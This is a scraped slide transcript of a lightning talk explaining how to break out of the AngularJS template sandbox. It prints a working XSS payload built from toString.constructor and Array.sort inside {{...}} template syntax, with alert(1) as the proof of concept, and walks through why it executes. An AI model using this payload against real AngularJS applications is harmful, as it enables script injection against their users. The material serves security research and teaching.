breaking angularjs javascript sandbox
DESCRIPTION
Lightning talk by avlidienburnn on how to break AngularJS sandbox and more or less XSS every AngularJS app out there (slight eTRANSCRIPT
![Page 1: Breaking AngularJS Javascript sandbox](https://reader038.vdocuments.us/reader038/viewer/2022100600/55660884d8b42a06318b463c/html5/thumbnails/1.jpg)
Breaking ngularJS Javascript sandbox
A lightning talk by avlidienbrunn
![Page 2: Breaking AngularJS Javascript sandbox](https://reader038.vdocuments.us/reader038/viewer/2022100600/55660884d8b42a06318b463c/html5/thumbnails/2.jpg)
What is AngularJS? And where’s the sandbox?
• Javascript framework for building single page web applications.
• Mustache style templates: Having <h1>{{1+2+3}}</h1> anywhere in Angular HTML app will render <h1>6</h1>
• Template expressions are evaluated with Javascript • Template expression Javascript is sandboxed - It can’t
reach [object Window] or DOM • If we could access dangerous objects from templates, we
could XSS any AngularJS app that prints user data in Angular bound HTML
![Page 3: Breaking AngularJS Javascript sandbox](https://reader038.vdocuments.us/reader038/viewer/2022100600/55660884d8b42a06318b463c/html5/thumbnails/3.jpg)
Executing JS… From JS• eval() - Unavailable under window • document.write - Unavailable under document • location=“javascript:” - Unavailable under
document • Function(“code”)() - Unavailable under blacklist • What else is there?
![Page 4: Breaking AngularJS Javascript sandbox](https://reader038.vdocuments.us/reader038/viewer/2022100600/55660884d8b42a06318b463c/html5/thumbnails/4.jpg)
The bypasstoString.constructor.prototype.toString=
toString.constructor.prototype.call;[“a”,"alert(1)"].sort(toString.constructor)
alert(1)
![Page 5: Breaking AngularJS Javascript sandbox](https://reader038.vdocuments.us/reader038/viewer/2022100600/55660884d8b42a06318b463c/html5/thumbnails/5.jpg)
["a","alert(1)"].sort(Function);
if(compareFunction(element1, element2) == 1){ //sort element as bigger }else if(… == 0){ //sort element as same }else{ //sort element as smaller }
if(Function("a", "alert(1)") == 1){ //sort element as bigger }else if(… == 0){ //sort element as same }else{ //sort element as smaller }
if((function(a){alert(1)}) == 1){ //sort element as bigger }else if(… == 0){ //sort element as same }else{ //sort element as smaller }
if((function(a){alert(1)}).toString() == 1..toString()){ //sort element as bigger }else if(… == 0){ //sort element as same }else{ //sort element as smaller }
toString.constructor.prototype.toString= toString.constructor.prototype.call; if((function(a){alert(1)}).call() == 1..toString()){ //sort element as bigger }else if(… == 0){ //sort element as same }else{ //sort element as smaller }
toString.constructor.prototype.toString= toString.constructor.prototype.call; if((function(a){alert(1)}).call() == 1..toString()){ //sort element as bigger }else if(… == 0){ //sort element as same }else{ //sort element as smaller }
["a","alert(1)"].sort(toString.constructor); {{toString.constructor.prototype.toString=
toString.constructor.prototype.call;[“a”,”alert(1)”].sort(toString.constructor)}}
The how
alert(1)
![Page 6: Breaking AngularJS Javascript sandbox](https://reader038.vdocuments.us/reader038/viewer/2022100600/55660884d8b42a06318b463c/html5/thumbnails/6.jpg)
+ =
That’s all folks!
A lightning talk by avlidienbrunn